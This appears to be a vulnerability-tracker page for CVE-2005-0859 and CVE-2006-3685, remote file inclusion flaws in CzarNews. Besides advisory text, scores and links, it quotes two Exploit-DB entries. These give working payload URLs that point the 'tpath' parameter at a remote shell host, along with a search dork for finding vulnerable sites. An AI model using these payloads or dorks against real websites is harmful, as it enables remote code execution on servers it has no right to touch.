CVE-2005-0859
published 2005-05-02CVE-2005-0859: PHP remote file inclusion vulnerability in CzarNews 1.13b allows remote attackers to execute arbitrary PHP code via the tpath parameter to (1) headlines.php or…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
11.40%
95.5th percentile
PHP remote file inclusion vulnerability in CzarNews 1.13b allows remote attackers to execute arbitrary PHP code via the tpath parameter to (1) headlines.php or (2) news.php. NOTE: some sources have reported the "dir" parameter as being affected; however, this is likely a cut-and-paste error from the wrong section of the original vulnerability report. Also, the news.php version was later reported to be in 1.12 through 1.14.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cwv7-44mr-m539: PHP remote file inclusion vulnerability in CzarNews 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-3685 [HIGH] GHSA-cwv7-44mr-m539: PHP remote file inclusion vulnerability in CzarNews 1
PHP remote file inclusion vulnerability in CzarNews 1.12 through 1.14 allows remote attackers to execute arbitrary PHP code via a URL in the tpath parameter to cn_config.php. NOTE: the news.php vector is already covered by CVE-2005-0859.
GHSA
GHSA-3rw5-32q5-6f2x: PHP remote file inclusion vulnerability in CzarNews 1
ghsa_unreviewed·2022-05-01
CVE-2005-0859 [HIGH] GHSA-3rw5-32q5-6f2x: PHP remote file inclusion vulnerability in CzarNews 1
PHP remote file inclusion vulnerability in CzarNews 1.13b allows remote attackers to execute arbitrary PHP code via the tpath parameter to (1) headlines.php or (2) news.php. NOTE: some sources have reported the "dir" parameter as being affected; however, this is likely a cut-and-paste error from the wrong section of the original vulnerability report. Also, the news.php version was later reported to be in 1.12 through 1.14.
No detection rules found.
Exploit-DB
CzarNews 1.14 - 'tpath' Remote File Inclusion
exploitdb·2006-07-13
CVE-2006-3685 CzarNews 1.14 - 'tpath' Remote File Inclusion
CzarNews 1.14 - 'tpath' Remote File Inclusion
---
CzarNews <= (tpath) Remote File Inclusion Exploit
|
Critical Level : Dangerous |
|
Dork : "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "
http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com
GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
# milw0rm.com [2006-07-13]
Exploit-DB
CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion
exploitdb·2005-03-21
CVE-2005-0859 CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion
CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/12857/info
CzarNews is prone to a remote file-include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
CzarNews 1.13b is reported vulnerable; other versions may be affected as well.
http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php
No writeups or analysis indexed.
http://secunia.com/advisories/14670http://securitytracker.com/id?1013486http://www.osvdb.org/14925http://www.osvdb.org/14926http://www.securityfocus.com/bid/12857http://www.securityfocus.com/bid/18411https://exchange.xforce.ibmcloud.com/vulnerabilities/19765https://exchange.xforce.ibmcloud.com/vulnerabilities/27733https://www.exploit-db.com/exploits/2009http://secunia.com/advisories/14670http://securitytracker.com/id?1013486http://www.osvdb.org/14925http://www.osvdb.org/14926http://www.securityfocus.com/bid/12857http://www.securityfocus.com/bid/18411https://exchange.xforce.ibmcloud.com/vulnerabilities/19765https://exchange.xforce.ibmcloud.com/vulnerabilities/27733https://www.exploit-db.com/exploits/2009
2005-05-02
Published